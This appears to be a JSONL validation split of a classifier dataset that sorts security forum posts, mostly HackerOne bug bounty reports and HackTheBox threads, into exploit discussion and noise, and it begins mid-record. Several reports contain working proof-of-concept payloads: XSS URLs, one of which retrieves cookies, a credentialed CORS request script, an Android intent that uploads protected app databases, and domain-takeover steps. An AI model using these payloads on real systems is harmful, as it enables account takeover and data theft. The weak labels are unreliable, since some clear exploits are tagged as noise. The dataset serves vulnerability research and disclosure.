Cosmos?\n\nI'm not Neg, and could never replace them, but there's still a place for enlightened discussion, don't you all think? I've not been around for a couple of decades, but an older and wiser me sees clearer now than the kid I was did.So let's start there...what would you tell your younger self, given the knowledge you have now?O", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "antionline", "timestamp": "2022-04-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "514022df1e3212ec1134", "text": "Hello, did you find a solution ? I have the same problem", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-01-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "342a5b06439ff6439bf4", "text": "[Cross-site Scripting (XSS) - Reflected] XSS by clicking Jira's link\n\n### Summary\n\nSince the value of `/-/jira_connect/users?return_to=xxx` of `xxx` is used as a link as it is, it becomes XSS in some browsers.\n\n### Steps to reproduce\n\n1. Prepare a gitlab environment with no CSP configured (e.g. `localhost`)\n2. Logged in with safari browser\n3. Go to the `https://localhost/-/jira_connect/users?return_to=javascript:alert(location)` URL\n4. click `Return to GitLab for Jira` button\n\n### Impact\n\nXSS\n\n### Examples\n\nAffects logged-in users regardless of project.\n\n### What is the current *bug* behavior?\n\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v13.11.3-ee/app/controllers/jira_connect/users_controller.rb\n\n```ruby\nclass JiraConnect::UsersController < ApplicationController\n feature_category :integrations\n\n layout 'signup_onboarding'\n\n def show\n @jira_app_link = params.delete(:return_to)\n end\nend\n```\n\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v13.11.3-ee/app/views/jira_connect/users/show.html.haml\n\n```haml\n - if @jira_app_link\n %p= external_link s_('Integrations|Return to GitLab for Jira'), @jira_app_link, class: 'gl-button btn btn-confirm'\n```\n\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v13.11.3-ee/app/helpers/external_link_helper.rb\n\n```haml\nmodule ExternalLinkHelper\n def external_link(body, url, options = {})\n link_to url, { target: '_blank', rel: 'noopener noreferrer' }.merge(options) do\n \"#{body}#{sprite_icon('external-link', css_class: 'gl-ml-1')}\".html_safe\n end\n end\nend\n```\n`external_link` has not verified the validity of the url.\n\n### What is the expected *correct* behavior?\n\nIf it is a link other than http and https, it will not work.\n\n### Relevant logs and/or screenshots\n\n{F1298918}\n\n### Output of checks\n\nBlocked by CSP at GitLab.com\n\n#### Results of GitLab environment info\n\n```\n# gitlab-rake gitlab:env:info\n\nSystem information\nSystem:\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.12\nGit Version:\t2.31.1\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.11.3\nRevision:\tb321336e443\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttps://gitlab.example.com\nHTTP Clone URL:\thttps://gitlab.example.com/some-group/some-project.git\nSSH Clone URL:\tgit@gitlab.example.com:some-group/some-project.git\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\nIt becomes XSS when the user is directed to the user who is logged in with the Safari browser to the instance where CSP is not set.\n\nChrome and Firefox showed other tabs and javascript was not executed.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "08fb5b8311444e3e0b0d", "text": "[Improper Access Control - Generic] Staff can create workflows in Shopify Admin without apps permission\n\n## Summary:\n[add summary of the vulnerability]\n\nAccording to publicly available docs, Flow can be accessed in two ways.\n1. through the Shopify organization admin (Shopify plus)\n2. by installing the Shopify Flow app.\nI stumbled on /admin/internal/web/graphql/flow endpoint which is accessible to a staff member with only `marketing` permission. The said endpoint makes it possible to create workflows and perform other flow related actions without using any of the two methods stated above. To substantiate my claim, I created a workflow that 'adds a tag whenever a customer registers an account' (created an account tag) see the image below for details.\n{F1667015} \n\nIt's worth mentioning that the workflows created this way don't show up in the app or any where else, information about them can only be gotten by hitting the same endpoint. There are couple of other mutations that are accessible but I used only `templateInstall` and `workflowActivate` for demonstration. What follows below are example GraphQL queries and steps to reproduce.\nFirst, we need to install a template to activate. \nSee the image below for details\n{F1667014}\n\n```\n{\"operationName\":\"templateInstall\",\"variables\":{\"templateId\":\"977bf9aa-ae6a-4a7c-b3f2-051c9e856c6f\",\"shopIds\":[]},\"query\":\"mutation templateInstall($templateId: ID!, $shopIds: [ID!]!) {\\n templateInstall(templateId: $templateId, shopIds: $shopIds) {\\n installed {\\n shopId\\n workflowId\\n workflowVersion\\n __typename\\n }\\n errors {\\n shopId\\n message\\n __typename\\n }\\n __typename\\n }\\n}\\n\"}\n\n```\nAfter installing a template of our choice, we then activate the workflow. \nSee the image below for details.\n{F1667018}\n\n```\n{\"operationName\":\"activateWorkflowMutation\",\"variables\":{\"workflowId\":\"240ed0ee-d099-4066-8eac-7ce777ef4fe4\",\"version\":\"acc5731a-7802-4622-857b-0191f8c0ee9d\",\"contextType\":\"shop\",\"contextId\":\"10979704928\"},\"query\":\"mutation activateWorkflowMutation($workflowId: ID!, $version: String, $contextType: String!, $contextId: ID!) {\\n workflowActivate(\\n workflowId: $workflowId\\n version: $version\\n contextType: $contextType\\n contextId: $contextId\\n ) {\\n workflow {\\n ...workflow\\n __typename\\n }\\n __typename\\n }\\n}\\n\\nfragment workflow on Workflow {\\n id\\n name\\n steps {\\n ...step\\n __typename\\n }\\n links {\\n ...link\\n __typename\\n }\\n activations {\\n ...activation\\n __typename\\n }\\n lastUpdated\\n activationState\\n versionState\\n version\\n parentVersion\\n shopifyDomain\\n shopifyName\\n owner {\\n contextId\\n contextType\\n __typename\\n }\\n ...validationErrors\\n tags\\n __typename\\n}\\n\\nfragment step on Step {\\n id\\n task {\\n ...task\\n __typename\\n }\\n position {\\n x\\n y\\n __typename\\n }\\n inputPort {\\n name\\n identifier\\n __typename\\n }\\n outputPorts {\\n name\\n identifier\\n __typename\\n }\\n ...stepConfig\\n note\\n description\\n __typename\\n}\\n\\nfragment task on Task {\\n id\\n label\\n description\\n dynamicDescriptionTemplate\\n taskType\\n path\\n inputPort {\\n id\\n name\\n __typename\\n }\\n outputPorts {\\n id\\n name\\n __typename\\n }\\n iconUrl\\n documentationUrl\\n __typename\\n}\\n\\nfragment stepConfig on Step {\\n id\\n taskType\\n task {\\n id\\n label\\n description\\n __typename\\n }\\n configFields {\\n __typename\\n ... on ArrayConfigField {\\n valuePlaceholder\\n stepConfigFieldIdentifier\\n supportsLiquid\\n description\\n label\\n value\\n validations {\\n id\\n options\\n errorMessage\\n __typename\\n }\\n __typename\\n }\\n ... on CollectionsConfigField {\\n valuePlaceholder\\n stepConfigFieldIdentifier\\n description\\n label\\n value\\n errors {\\n title\\n message\\n __typename\\n }\\n __typename\\n }\\n ... on BooleanConfigField {\\n valuePlaceholder\\n ", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4138cc1d0bb900eed4f8", "text": "Three start point\n\nHi every one. Can i ask for the machine Three in start point is still alive. How i can use the command=id. I upload shell.php already but the url is not work for use cmd. I try 10 times but it is same problem. I do not have any idea for that. any one can help me plssssss!!! get /shell.php?command=id HTTP/1.1 response : HTTP/1.1 404 Not Found I had checked in aws in thetoppers.htb, there was shell.php aleady.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dab78ff0b33ca48973db", "text": "I used too this: But I dont know why i cannot get flag, and this payload is triggered as malicious. Anyone could help me with that? Thx", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-10-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6256152a180e512620e5", "text": "[Business Logic Errors] CVE-2022-27775: Bad local IPv6 connection reuse\n\n## Summary:\nCurl doesn't consider IPv6 address zone index when doing connection reuse. if connection exists to specific IPv6 address (and other conditions for connection reuse are fulfilled) it will be reused for connections regardless of the zone index.\n\n## Steps To Reproduce:\n\n 1.Set up a fake server: `echo -ne 'HTTP/1.1 200 OK\\r\\nContent-Length: 6\\r\\n\\r\\nHello\\n' | nc -6 -v -l -p 9999`\n 2. curl \"http://[ipv6addr]:9999/x\" \"http://[ipv6addr%25lo]:9999/y\"\n\nBoth connections arrive to the test server:\n\n```\nListening on :: 9999\nConnection received on somehost someport\nGET /x HTTP/1.1\nHost: [ipv6addr]:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\n\nGET /y HTTP/1.1\nHost: [ipv6addr]:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\n```\n\nClearly the 2nd connection should fail as the address is not available at interface lo. (Lone connection to `http://[ipv6addr%25lo]:9999/` fails with `curl: (7) Couldn't connect to server`)\n\n## Impact\n\nReuse of wrong connection leading to potential disclosure of confidential information.\n\nPractical impact of this vulnerability is very low, due to the rarity of situation where interfaces would have identical addresses. The attacker would also need to be able to manipulate the addresses the victim app connects to (making it first connect to interface controlled by the attacker).Finally, it doesn't seem likely that TLS would be used for such connections, making the scenario rather insecure to begin with.It seems likely that if the attacker has ability to set up interfaces with identical addresses they would have easier way to compromise the system anyway.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-27775"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "558b900908761d558a96", "text": "[Improper Access Control - Generic] Broken access discloses users and PII at https://███████ [HtUS]\n\nGood morning,\n\nI was able to register at https://████/ and get the list of users.\n1- Go to https://██████████/OA_HTML/ibeCAcpSSOReg.jsp and register.\n2- Go to https://███/OA_HTML/AppsLocalLogin.jsp with the created user and login.\n3- On the homepage, click on vacations rules, create, and search users.\n4- User are disclosed.\n\n██████\n\nRegards,\n\nG4MB4\n\n## Impact\n\nAn attacker is able to access users information.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4ee88633e86df298d367", "text": "[Improper Access Control - Generic] LDAP Server NULL Bind Connection Information Disclosure\n\n**Description:**\nThe remote LDAP server allows anonymous access\n\n## References\n - https://www.tenable.com/plugins/nessus/10723\n - https://ldap.com/ldapv3-wire-protocol-reference-bind\n\n## Impact\n\ninformation disclosure\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. run $ `nmap -n -sV --script \"ldap* and not brute\" -p 389 ██████████`\n\ncheck the response\n## POC\n██████\n\n## Suggested Mitigation/Remediation Actions\nConfigure the service to disallow NULL BINDs.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a5577ab398f29c3d0866", "text": "[Unknown] Yet another SSRF query for Go\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "749b17025e17eb62019f", "text": "[Cross-site Scripting (XSS) - Stored] Stored cross-site scripting in dataset owner.\n\nHi again. Another XSS this time.\n**Summary:** Unescaped chars in 'dataset owner' could be abused to store arbitrary javascript.\n\n**Description:** There is a 'dataset owner' field in new 'custom dataset dashboard' which contains unsanitized output. If attacker would modify his name, like first name '', the field would hold a script. While for most users this is a case of self-xss, for enterprise users (for which, as i understand. this field was introduced in the first place), it can lead to executing arbitrary javascript.\n\n**Steps To Reproduce:**\n\n 1. Put the payload in name and/or surname\n *(first name '')*\n 2. Navigate to custom datasets. \n\n\n**Test account information**\n\ntvburis+hackerone@gmail.com\n\n## Impact\n\nExecuting arbitrary javascript, stealing other users' algos as demonstrated in previous reports with XSS on quantopian domain.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "63b9d570b31dd72bcec6", "text": "[Unknown] CPP: Pam Authorization Bypass\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1d4f6951236ed01e2ec4", "text": "[Plaintext Storage of a Password] Mail app stores cleartext password in database until OAUTH2 setup is done\n\n## Summary:\n\nThe Mail app usually stores the user password encrypted. For XOAUTH2 the encrypted access token is stored in the same columns. However, during the time of the setup, XOAUTH2 accounts have the password in clear text in the database.\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 0. Configure Gmail Oauth client ID and secret as Nextcloud admin\n 1. Open the Mail app\n 2. Open the setup page\n 3. Enter values for display name\n 4. Enter a random value for the password\n 5. Enter the gmail address\n\n-> password field hides\n\n 6. Continue the setup\n\nOnce the Gmail consent popup shows, look into oc_mail_accounts and the last entry.\n\ninbound_password and outbound_password have the random value entered for the password.\n\n## Supporting Material/References:\n\n * N/A\n\n## Impact\n\nA DBA could read the plaintext password", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ccecac4675f1d19ed9ab", "text": "[Unknown] C/C++: Command injection via wordexp\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7aabc07a7bcde4cca538", "text": "[Privilege Escalation] Domain Takeover - gl-canary.freetls.fastly.net\n\nHello Gitlab!\n\nThe domain `gl-canary.freetls.fastly.net` is whitelisted in gitlab.com Content Security Policy. See `Content-Security-Policy` HTTP header from gitlab.com:\n\n```\nContent-Security-Policy: connect-src 'self' https://assets.gitlab-static.net https://gl-canary.freetls.fastly.net wss://gitlab.com https://sentry.gitlab.net https://customers.gitlab.com https://snowplow.trx.gitlab.net; frame-ancestors 'self'; frame-src 'self' https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://content.googleapis.com https://content-compute.googleapis.com https://content-cloudbilling.googleapis.com https://content-cloudresourcemanager.googleapis.com https://*.codesandbox.io; img-src * data: blob:; object-src 'none'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://assets.gitlab-static.net https://gl-canary.freetls.fastly.net https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.gstatic.com/recaptcha/ https://apis.google.com 'nonce-bjSllX/7AnVrXL1QQxsb+w=='; style-src 'self' 'unsafe-inline' https://assets.gitlab-static.net https://gl-canary.freetls.fastly.net; worker-src https://assets.gitlab-static.net https://gl-canary.freetls.fastly.net https://gitlab.com blob:\n```\n\nThis domain can be controlled from any fastly.com account:\n1. Register at https://www.fastly.com/signup\n2. Go to https://manage.fastly.com/services/all\n3. Create a new service \n4. Use `gl-canary.global.ssl.fastly.net` as domain. (Fastly automatically creates .freetls.fastly.net. See https://docs.fastly.com/en/guides/setting-up-free-tls#support-for-http2-ipv6-and-tls-12)\n5. Configure hosts\n\n## Impact\n\nAn attacker can use the domain to bypass the CSP and execute malicious client-side code (for example, the client application may have an XSS vulnerability).\nThe domain could potentially be used elsewhere in Gitlab application (CDN, for example).", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "78b4508dda14d8ba5a67", "text": "using apt list --installed | wc --lines will always give you incorrect answer cause it add a line before printing actual installed packages. using dpkg -l | grep '^ii' will show you the exact count", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-09-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4bd4655d000a7ff7b6d7", "text": "[Phishing] Brave Shield for iOS is weak against IDN homograph attacks\n\n## Summary:\n\nIn most parts of Brave for iOS, including the address bar, protection against IDN attacks are implemented.\nHowever, Brave Shield has no countermeasures.\nFor example, when you visit https://www.xn--80ak6aa92e.com , Brave Shield panel in the address bar shows the domain of this site is \"apple.com\".\nThis may lead users to be deceived into believing that the site is legitimate.\n\n## Products affected: \n\n * Brave for iOS (Version 1.45.2)\n\n## Steps To Reproduce:\n\n * Visit https://www.xn--80ak6aa92e.com\n * Open Brave Shield panel from the address bar\n * \"apple.com\" is shown in the panel\n\n## Supporting Material/References:\n\n * See the screenshot I attached.\n\n## Impact\n\nThis may lead users to be deceived into believing that the site is legitimate.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7eac6f4eda4d4d304aa3", "text": "[Cross-site Scripting (XSS) - Reflected] Cross-site Scripting (XSS) - Reflected at https://██████████/\n\nHello Team,\ni just found a reflected xss bug on your web https://█████\n\nStep To reproduce:\n poc url: https://████/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E\n\n## Impact\n\nImpact\nData can be stolen, or Javascript can be executed.This is will allow the attacker to steal users cookies\n\n## System Host(s)\n██████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. go to parameter https://█████████/7/0/33/1d/www.citysearch.com/search?what=x&where=\n2. enter \">\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "af498dd434ed0cddae1f", "text": "I’m stuck on this too. What do you mean by FW rule?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-12-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ef6cf649750ef8a76250", "text": "[Unknown] Cross-origin resource sharing: arbitrary origin trusted\n\nreferred from\nCWE-942: Permissive Cross-domain Policy with Untrusted Domains\n\nIssue detail\nThe application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin https://example.com \n\nrequest\nPOST /sockjs/247/17r_rtj0/xhr HTTP/1.1\nHost: ██████████\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nOrigin: https://example.com\nReferer: https://███████/home\nSec-CH-UA: \".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"108\", \"Chromium\";v=\"108\"\nSec-CH-UA-Platform: Windows\nSec-CH-UA-Mobile: ?0\nContent-Length: 0\n\nreponse\nHTTP/1.1 200 OK\nServer: nginx\nDate: Fri, 27 Jan 2023 11:47:15 GMT\nContent-Type: application/javascript; charset=UTF-8\nConnection: close\nVary: Accept-Encoding\nCache-Control: no-store, no-cache, no-transform, must-revalidate, max-age=0\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Origin: https://example.com\nVary: Origin\nContent-Length: 2\n\no\n\n\nPOC 2\n1.open https://example.com in browser then inspect the page and go to console.\n2.run the following code in console and you would find it pops up user information\n\nvar req = new XMLHttpRequest(); req.onload = reqListener; req.open('post','https://████/sockjs/247/17r_rtj0/xhr',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };\n\nExploit\n\n\n\n\n\nComment\nAttacker would treat many victims to visit attacker's website, if victim is logged in, then his personal information is recorded in attacker's server\nHow to fix\nRather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.\n\n## Impact\n\nIssue background\nAn HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.\nTrusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.\nIf the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "595833d3e482715f0f46", "text": "[Phishing] Address Bar Spoofing on TOR Browser\n\nHi TOR team,\n\nI would like to report a security bug in your browser:\n\nStep 1: Goto http://www.ոokia.com/(http://jsbin.com/wuyikedaxi/1/edit?html,output)\nStep 2: Observe that address bar points to http://www.ոokia.com/ which actually to be pointing to http://xn--okia-zgf.com, however browser displays www.ոokia.com/\n\nActual results:\n\nAddress bar points to a spoofed domain http://www.ոokia.com/. Address bar fails to parse character \"ո\"(U+0578 Armenian Small Letter). Several other characters from Armenian family lead to the same effect. \n\nExpected results:\n\nTORbrowser should have resolved the domain to real http://xn--okia-zgf.com. On chrome, internet explorer and firefox it resolves to xn--okia-zgf.com.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d80aacf68344f3d0dcee", "text": "[Cross-site Scripting (XSS) - DOM] Cookie exfiltration through XSS on the main search request of www.lahitapiola.fi\n\n## Basic report information\n**Summary:** \nAdding extra search parameters generates the creation of new input fields which can be escaped, thus generating HTML injection possibilities, Cross-Site Scripting attacks, and the retrieval of the page's cookies.\n\n**Description:** \n\n - Observing the Bug\n\nI was researching the parameters of search bar from the main page. While search this creates links of the type: `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=testing`. By adding additional URL parameters, `&random=parameter`, the website creates hidden input fields with the `name` being the first word (random) and the `value` being the second word (parameter). See figure:\n\n{F1428608}\n\nBy creating a name variable with `\">`, such as `&random\">=parameter`, one can escape the input element. See figure:\n\n{F1428610}\n\nFull URL to replicate escape to HTML: `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=testing&random%22%3E=parameter`\n\nIn consequence, this allows an attacker to generate any html and to inject the page with any HTML elements. For example, ** a payload can be generated to display a link towards an attacker's website**. The following link, `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=test&other=anything&again%22/%3E%3C/div%3E%3Ca%20href%3D%22https://www.google.com%22%3EClicking%3C/a%3E%3Cinput%20type%3D%22hidden=alert`, does exactly that if a user clicks on the \"Clicking\" link.\n\n - XSS\n\nBasic protection impedes an attacker from triggering simple XSS payloads. However, through testing a certain payload works. See figure:\n\n{F1428612}\n\nBy hovering and moving around the screen over the *Click Me*, an XSS payload is executed.\n\nURL to reproduce: `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=test&other=anything&again%22/%3E%3C/div%3E%3Cdiv%2fOnpOinTeReNter%3dconfirm(document.domain)%3Eclick%20here%3Cinput%20type%3D%22hidden=alert`\n\n**Javascript payloads can run directly in the user's browser.**\n\n- Getting Cookies\n\nRetrieving the cookies was an extra step of difficulty, however, here is a payload that works and an image to show it working. The `document.cookie` command seems to be blocked but not the `self[Object.keys(self)[5]].cookie`. In consequence, to trigger this payload a few attempts might be required, the hardcoded `5` is the origin of this issue as Object.keys(self) changes in time I believe. I seem to make it work 1 out of 5 times.\n\n{F1428615}\n\nURL to reproduce: `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=test&other=anything&again%22/%3E%3C/div%3E%3Cdiv%2fOnpOinTeReNter%3dconfirm(self[Object.keys(self)[5]].cookie)%3Eclick%20here%3Cinput%20type%3D%22hidden=alert`\n\n**Cookies and session cookies can be retrieved and exfiltrated to an attacker using javascript.** This poses a risk on any user that is sent a link from anyone else.\n\n**Impact:**\nThe vulnerability allows for HTML injection, XSS, and cookie retrieval. The impact is important as the URL is the landing page of the website and is simply triggered through a link. In consequence, an attacker could send any user a link from the website and **retrieve their session cookies** or any commonly XSS attacks. The HTML injection allows a button to be injected redirecting towards any possible websites which is an **Open Redirect** vulnerability.\n\n## Browsers / Apps Verified In:\nWorks in (all up to date at the time of the report):\n * Google Chrome - Version 92.0.4515.159 (Official Build) (64-bit)\n * Microsoft Edge - Version 92.0.902.84 (Official build) (64-bit)\n\n## Steps To Reproduce:\n\n 1. Modify the URL parameters of the main page to escape an html element and inject any html element. URL:\n`https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=testing&random%22%3E=parameter`\n 2. With the new HTML element find a way to add an XSS payload. URL:\n `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=test&other=anything&again%22/%3E%3C/div%3", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fbac1730a58430cdd55c", "text": "[Cross-site Scripting (XSS) - Generic] yelp.com and biz.yelp.com ATO via XSS + Cookie Bridge\n\n# Summary\nI've found an XSS on `biz.yelp.com` where the unverified email will be reflected in a message, prompting the user to verify the email. This XSS can be combined with the cookie bridge functionality to target other uses with the XSS. The XSS can then be combined with the cookie bridge a second time to leak `HttpOnly` session cookies, and makes account takeover possible for both business accounts and regular accounts.\n\n# Description\n## XSS in business user email\nWhen a business user has not verified their email, a message is shown telling them to verify the email. The users email is reflected in this message, and it's possible to choose an email that will result in XSS.\n███████\nThere is a 64 char limit on the chosen email, but it's just enough to achieve arbitrary javascript execution by choosing the email\n```\n\" \n\n \n\n\n\nCopy and paste above given code and save it with hack.html and open it in browser\n\n\n\n------------------------------------------------------------------->\n\nRecommendation :- \n\nAdd X-FRAME-OPTIONS header to mitigate the issue\n\n## Impact\n\nAn attacker may use this risk to invisibly load the target website into their own site and trick users into clicking on links which they never intended to. An \"X-Frame-Options\" header should be sent by the server to either deny framing of content, only allow it from the same origin or allow it from a trusted URIs.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "130bdb85781f93b5c3d9", "text": "[Violation of Secure Design Principles] Theft of protected files on Android\n\nThere is an issue that allows to retrieve any files from protected directory of application - ```/data/data/com.owncloud.android/*```.\nThe issue is caused by exported activity ```com.owncloud.android.ui.activity.ReceiveExternalFilesActivity``` with intent filter ```android.intent.action.SEND_MULTIPLE``` that accepts URI of files for upload. Any 3rd-party application could start this activity and upload on server any files such as database file from protected directory in context of owncloud application.\n\nTested on latest stable version of app - 2.19.\nVersion of android - 11.\n\nJava PoC:\n```Java\nStrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();\nStrictMode.setVmPolicy(builder.build());\nIntent intent = new Intent(\"android.intent.action.SEND_MULTIPLE\");\nintent.setClassName(\"com.owncloud.android\", \"com.owncloud.android.ui.activity.ReceiveExternalFilesActivity\");\nintent.setType(\"*/*\");\nintent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);\nArrayList mStreamsToUpload = new ArrayList<>();\nmStreamsToUpload.add(Uri.parse(\"file:///data/data/com.owncloud.android/databases/filelist\"));\nintent.putExtra(\"android.intent.extra.STREAM\", mStreamsToUpload);\nstartActivity(intent);\n```\n\n**Mitigation:**\nThere is valid protection for preventing reading files from directory ```/data/data/com.owncloud.android/*``` in similar intent-filter ```android.intent.action.SEND```. Copy this protection for ```android.intent.action.SEND_MULTIPLE```.\n\n## Impact\n\nPotential attacker could steal files from protected directory of application for example files of databases, cache and history of files.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e2f8bc839c09a2a5bfea", "text": "[Violation of Secure Design Principles] Redirecting users to malicious torrent-files/websites using WebTorrent\n\n## Summary:\n\nAn attacker can redirect a user to a malicious torrent file/website using a reverse tab-nabbbing flaw in WebTorrent.\n\n\n##Description\n\nWebTorrent allows user to open files after download of while they are being downloaded directly from the browser\n\n{F965466}\n\nAn attacker can use this to redirect users to malicious websites and torrent files as the anchor tag allowing to open up the file is not prone to reverse tabnabbing attacks.\n\n{F965467}\n\n##Tested on\n\n* Brave 